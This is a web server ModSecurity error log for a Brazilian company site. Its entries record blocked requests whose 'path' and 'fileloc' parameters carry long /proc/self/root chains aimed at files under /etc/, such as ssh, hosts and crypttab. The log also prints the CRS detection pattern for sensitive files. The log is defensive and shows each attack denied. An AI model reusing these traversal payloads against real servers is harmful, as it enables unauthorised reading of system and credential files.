[Tue Mar 17 11:02:03.951414 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:32872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able2zarLhPAjZGI1b23HwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:02:09.759500 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:51968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able4TarLhPAjZGI1b23KwAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:02:17.706688 2026] [:error] [pid 8856:tid 140411590858496] [client 74.7.243.203:38406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able6XUHeC6oxrTQ0VC3MwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:02:25.600012 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:38418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able8aBJNF7axNlVR0UFZgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:02:35.039677 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:42450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able--82sZHvlq4xgHrNGQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:02:36.463868 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.243.203:42436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able_L-sgTmmJoPuMdynnQAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:02:37.841505 2026] [:error] [pid 8856:tid 140411725141760] [client 74.7.243.203:42448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "able_XUHeC6oxrTQ0VC3NQAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:02:40.343505 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.46:56594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfAAeiSKl8TjouI-YKMgAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:02:52.956344 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:42462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfDNCmCSWTlPouqorVMQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:03:39.791114 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:56898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfO64xEDsg_V3ESNY8wgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:03:50.897689 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:42644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfRtCmCSWTlPouqorVRQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:03:54.031473 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:59478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfSqBJNF7axNlVR0UFfQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:03:59.303086 2026] [:error] [pid 9155:tid 140411624429312] [client 74.7.243.203:59484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfT9bI7zhHXcabyMUufAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:04:15.707140 2026] [:error] [pid 18709:tid 140411616036608] [client 74.7.241.46:34382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfXjarLhPAjZGI1b23wQAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:04:21.429467 2026] [:error] [pid 1016:tid 140411699963648] [client 74.7.244.31:50078] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablfZZqmL8PQht4WJFlQlwAAAUU"]
[Tue Mar 17 11:04:43.661140 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:42674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfe64xEDsg_V3ESNY87gAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:04:50.654881 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:56952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfgqBJNF7axNlVR0UFjgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:05:32.107607 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:60900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfrNCmCSWTlPouqorVgwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:06:02.870411 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:58840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfyqBJNF7axNlVR0UF4wAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:04.251077 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:52624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfzKBJNF7axNlVR0UF5gAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:05.453944 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:52640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablfze82sZHvlq4xgHrNWAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:12.759551 2026] [:error] [pid 1016:tid 140411599251200] [client 74.7.241.46:37652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf1JqmL8PQht4WJFlQ3wAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
